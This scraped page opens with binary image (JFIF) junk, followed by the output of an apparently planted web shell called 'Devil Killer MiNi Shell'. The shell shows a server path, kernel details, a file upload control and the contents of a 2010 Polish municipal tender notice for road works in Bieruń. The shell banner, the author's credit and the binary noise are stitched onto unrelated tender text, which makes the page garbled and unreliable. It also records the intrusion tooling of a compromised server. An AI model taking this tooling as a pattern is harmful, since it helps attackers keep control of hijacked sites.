JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100125/20400-N-2010.html

<p class="kh_header"><b>Bieruń: Wybór wykonawcy inwestycji pn.: Budowa ul. Nasypowej w Bieruniu Nowym wraz  z przebudową skrzyżowania ul. Warszawskiej z ul. Solecką i Nasypową</b><br>
<b>Numer ogłoszenia: 20400 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór wykonawcy inwestycji pn.: Budowa ul. Nasypowej w Bieruniu Nowym wraz  z przebudową skrzyżowania ul. Warszawskiej z ul. Solecką i Nasypową.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ulicy Nasypowej wraz z budową nowego odcinka ul. Nasypowej, tj. łącznika pomiędzy ul. Solecką a ul. Nasypową, przebudową skrzyżowania ul. Warszawskiej z ul. Solecką i Nasypową w Bieruniu Nowym wraz z budową kanalizacji deszczowej, budową oświetlenia ulicznego oraz przebudową linii nN. Łączna długość drogi: ok. 685,0 m.                                 Zaleca się dokonać wizji lokalnej w terenie przed przystąpieniem do robót.
Zakres rzeczowy:
1.	Roboty geodezyjne.
2.	Roboty drogowe - rozbiórkowe, ziemne i nawierzchniowe:
-	usunięcie drzew i krzewów;
-	rozbiórka konstrukcji jezdni, chodników, zjazdów oraz obramowania nawierzchni;
-	wykonanie drenażu francuskiego;
-	wykopy mechaniczne, ręczne; profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni;
-	wykonanie konstrukcji jezdni - nawierzchnia z betonu asfaltowego (ul. Solecka);
-	wykonanie konstrukcji jezdni - nawierzchnia z kostki betonowej (ul. Nasypowa);
-	wykonanie konstrukcji chodników i zjazdów, szykan drogowych, wyniesionych skrzyżowań
	- nawierzchnia z kostki betonowej;
-	elementy ulic: krawężniki betonowe, obrzeża betonowe;
-	badania nośności.
3.	Wykonanie oznakowania poziomego i pionowego, urządzeń bezpieczeństwa ruchu.
4.	Zieleń.
5.	Regulacja istniejących urządzeń do projektowanych rzędnych.
6.	Kanalizacja deszczowa:
-	wykopy liniowe mechaniczne, ręczne, przekopy kontrolne;
-	wykonanie kolektora kanalizacji deszczowej z rur PVC-U klasy S o 400, o 250 oraz o 200; 
-	przykanaliki z rur PVC-U klasy S o 160 mm;
-	wpusty uliczne z tworzywa sztucznego o 600 mm;
-	studnie rewizyjne z tworzywa sztucznego o 1000 mm;
-	studnie rewizyjne osadnikowe betonowe o 1200 mm;
-	próba szczelności kanałów rurowych.
7.	Budowa kablowej linii oświetlenia drogi.
-	sieć oświetleniowa - kablowa, kabel YAKY 4x35 - częściowo w osłonie rurowej DVK-110;
-	słupy oświetleniowe z wysięgnikami i oprawami;
-	badania i pomiary.
8.	Przebudowa linii Nn kolidujących z przebudową drogi.
-	demontaż słupów oświetleniowych (słupa pojedynczego, 2 słupów rozkracznych);
-	demontaż, montaż przewodów nieizolowanych linii nN;
-	montaż przewodów izolowanych linii nN typu AsXSn;
-	montaż słupów oświetleniowych z wysięgnikami i oprawami;
-	badania i pomiary.

9.	Wykonanie geodezyjnej inwentaryzacji powykonawczej ulicy Nasypowej, kanalizacji deszczowej, oświetlenia ulicznego oraz przebudowanej sieci elektroenergetycznej, wniesienie pomiarów do Dokumentacji Powykonawczej, uzupełnienie wynikami pomiaru powykonawczego zasobu mapowego Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej w Bieruniu                                i przekazanie jej zamawiającemu nie później, niż w terminie zakończenia przedmiotu umowy.
10. Wykonanie projektu tymczasowej organizacji ruchu, uzyskanie uzgodnień i zatwierdzeń 
      projektu organizacji ruchu z GDDKiA, uzyskanie opinii dla tego projektu Śląskiej Komendy 
      Wojewódzkiej Policji oraz uzyskanie zezwolenia na zajęcie pasa drogowego na czas 
      prowadzenia robót.

Warunki i wymagania:
Dokładny zakres prac określono w dokumentacji projektowej oraz w przedmiarach robót, które są załącznikiem do niniejszej SIWZ.
Jeżeli w dokumentacji technicznej, specyfikacji technicznej (ST) oraz SIWZ określone zostały materiały 
i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można
zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w projekcie i specyfikacji technicznej wykonania i odbioru robót. 
Zabudowane i dostarczone materiały budowlane i instalacyjne muszą posiadać wszystkie
wymagane Prawem budowlanym i polskimi normami, przenoszącymi zharmonizowane normy
europejskie, atesty, certyfikaty i aprobaty techniczne.
Zaleca się dokonać wizji lokalnej w terenie przed opracowaniem oferty.
Wybrany  w przetargu Wykonawca na żądanie Zamawiającego przedstawi szczegółowy harmonogram realizacji robót w ciągu 14 dni od daty wezwania.
Zamawiający nie przewiduje zawarcia umowy ramowej, aukcji elektronicznej, udzielenia zamówień uzupełniających.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9, 45.23.21.30-2, 45.31.51.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości  50 000 zł (słownie: pięćdziesiąt tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy spełniają warunki:
1.	Posiadają uprawnienia do wykonywania określonej  działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Ocena spełnienia powyższego warunku nastąpi na zasadzie spełnia/nie spełnia na podstawie oświadczenia, o którym mowa  w dziale VIII SIWZ),
2.	Posiadają wiedzę i doświadczenie.
Ocena spełnienia tego warunku nastąpi na zasadzie spełnia/ nie spełnia  na podstawie wykazu,               o którym mowa w dziale VIII SIWZ, zawierającego że w ostatnich pięciu latach przed dniem wszczęcia postępowania wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli,                 a jeśli okres działalności jest krótszy - to w tym okresie roboty remontowe lub inwestycyjne                        w zakresie budowy lub modernizacji dróg, chodników, parkingów lub placów  o nawierzchni z kostki o łącznej  wartości brutto minimum  2 500 000 zł .
       Przy ocenie spełnienia warunku  Zamawiający będzie brał pod uwagę tylko te zadania, których     
       odbiór  dokonany został w ostatnich pięciu latach przed dniem wszczęcia postępowania.                         
3.    Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania  
       zamówienia.
       Ocena spełnienia tego warunku nastąpi na zasadzie spełnia/nie spełnia na podstawie 
       oświadczenia, o którym mowa w dziale VIII SIWZ oraz wykazu  osób, o którym mowa 
       w dziale VIII SIWZ, a które kierować  będą robotami drogowymi, kanalizacyjnymi  i elektrycznymi 
       wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  oraz  
       oświadczenia, że osoby te posiadają  uprawnienia bez ograniczeń do kierowania robotami 
       drogowymi, kanalizacyjnymi i elektrycznymi (uprawnienia drogowe, sieci sanitarnych, sieci 
       elektrycznych) i posiadają zaświadczenia o przynależności do Okręgowej Izby Inżynierów  
       Budownictwa.  
4.    Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.
       Ocena spełnienia tego warunku nastąpi na zasadzie spełnia/nie spełnia na podstawie dokumentu,
       o którym  mowa w  dziale  VIII SIWZ, tj. informacji z banku lub spółdzielczej kasy 
       oszczędnościowo-kredytowej, w których wykonawca  posiada rachunek bankowy, potwierdzającej 
       wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości                           
       min. 300 000,00 zł ,  wystawionej nie wcześniej  niż 3 m-ce przed upływem terminu składania ofert.
5.    Nie podlegają wykluczeniu na podstawie art.24 ust. 1 ustawy Pzp.
       Ocena spełnienia warunku nastąpi na zasadzie spełnia/ nie spełnia  na podstawie oświadczenia, 
       o którym mowa w dziale VIII SIWZ.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, 
iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając                w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
W takim przypadku wykonawca wskaże, jaki zakres zamówienia zostanie powierzony innym podmiotom, przedstawiając równocześnie pisemne zobowiązanie tych podmiotów , że będą uczestniczyć w realizacji zamówienia oraz oświadczenie wykonawcy o braku podstaw do ich wykluczenia z art.24 ust.1 ustawy.
Jeżeli wykonawca, wykazując spełnienie warunku,  o którym mowa w art.22 ust. pkt r ustawy, polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art.,26 ust.2b ustawy, wymaga się przedłożenia informacji, o której mowa w dziale VIII SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> DOKUMENTY:
Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest, w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy oraz w celu wykazania braku podstaw do wykluczenia o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art.24 ust.1 ustawy, przedstawienie wymienionych niżej dokumentów. Dokumenty te, zgodnie z obowiązującym w tym zakresie Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. (Dz. U.  Nr 226/2009, poz. 1817), mogą być przedstawione w formie oryginału albo kopii poświadczonej za zgodność                      z oryginałem (wymaga  się poświadczenia każdej zapisanej strony dokumentu) przez wykonawcę, tzn. osobę (osoby) uprawnioną(e) do podpisania oferty:
1.   Wykaz wykonanych z należytą starannością w okresie ostatnich pięciu lat przed dniem wszczęcia 
      postępowania robót remontowych lub inwestycyjnych w zakresie budowy lub modernizacji dróg, 
      chodników, parkingów lub placów o nawierzchni z kostki  o łącznej wartości  brutto min. 2 500 000 zł.
      Przy ocenie spełnienia warunku  Zamawiający będzie brał pod uwagę tylko te zadania, których     
      odbiór  dokonany został w ostatnich pięciu latach przed dniem wszczęcia postępowania.
     Jeżeli okres działalności wykonawcy jest krótszy niż określony w pkt 3,  to należy potwierdzić 
      wymagany w w/w punkcie warunek dla krótszego okresu działalności.
      Wykaz należy sporządzić wg wzoru tabeli stanowiących załącznik do SIWZ.
2.   Dokumenty (np. referencje, protokoły odbioru końcowego) potwierdzające że roboty wymienione                 
       w  wykazie zostały  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
3.    Wykaz osób, które kierować  będą robotami drogowymi, kanalizacyjnymi  i elektrycznymi 
       wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia.  
4.   Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej ,w których wykonawca 
      posiada rachunek bankowy, potwierdzająca wysokość    posiadanych środków finansowych lub 
      zdolność kredytową wykonawcy, wystawiona nie wcześniej  niż 3 m-ce przed upływem terminu 
      składania ofert.
5.   Pisemne zobowiązanie podmiotów, które uczestniczyć będą w realizacji zamówienia.

OŚWIADCZENIA
Każdy Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
A .   Oświadczenia z art. 22 ust.1 ustawy, że:
1)	posiada uprawnienia do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
              2)   posiada  wiedzę i doświadczenie
              3)   dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania  
                    zamówienia
         4)   znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
B.    Oświadczenie, z art. 24 ust. 1 ustawy, że nie podlega wykluczeniu z postępowania.
C.   Oświadczenie, że po zapoznaniu się z SIWZ akceptuje ją bez zastrzeżeń.
D.   Oświadczenie, że będzie związany ofertą przez 30 dni od daty upływu terminu składania ofert, 
       a w przypadku wygrania przetargu zawrze umowę wg wzoru dołączonego do specyfikacji 
       w ciągu 14 dni od daty otrzymania zawiadomienia o wyborze oferty.
E.   Oferta jest jawna w całości/części. Strony oferty od -do  stanowią tajemnicę 
       przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej  konkurencji i nie mogą być 
       ujawnione innym uczestnikom postępowania (z uwzględnieniem pkt. I.4,ppkty 7 i 8 SIWZ).
F.  Oświadczenie podmiotów występujących wspólnie ( w przypadku ich uczestnictwa).
G.  Oświadczenie, że zamówienie wykona wykonawca sam/ lub zakres dotyczący .................................. 
       wykona Wykonawca sam, natomiast  zakres dotyczący.: (wymienić części zamówienia) ,zostanie 
       powierzony podwykonawcom lub całość robót zostanie powierzona innym podmiotom.
H.   Oświadczenie o ujęciu w kosztach pośrednich kosztów nie będących kosztami z przedmiaru.    
I.    Oświadczenie osoby lub osób, że jest/ są uprawniona/e  do zaciągania zobowiązań w imieniu 
       wykonawcy.
J.     Oświadczenie o posiadaniu uprawnień budowlanych przez osoby wymienione w wykazie osób, 
       które będą kierować robotami oraz zaświadczeń z Okręgowej Izby Inżynierów Budownictwa.
Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy  lub osobę ( osoby) z odpowiednimi pełnomocnictwami, złożonymi w formie oryginałów lub notarialnie poświadczonych kopii.

Uwaga:
Jeżeli  wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 
wszystkie dokumenty , o których mowa w SIWZ ,  sporządzone w języku obcym należy złożyć wraz 
z tłumaczeniem na język polski..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Gwarancja - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2010 godzina 12:00, miejsce: Urząd Miejski w Bieruniu - kancelaria (parter)
43-150 Bieruń, ul. Rynek 14.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com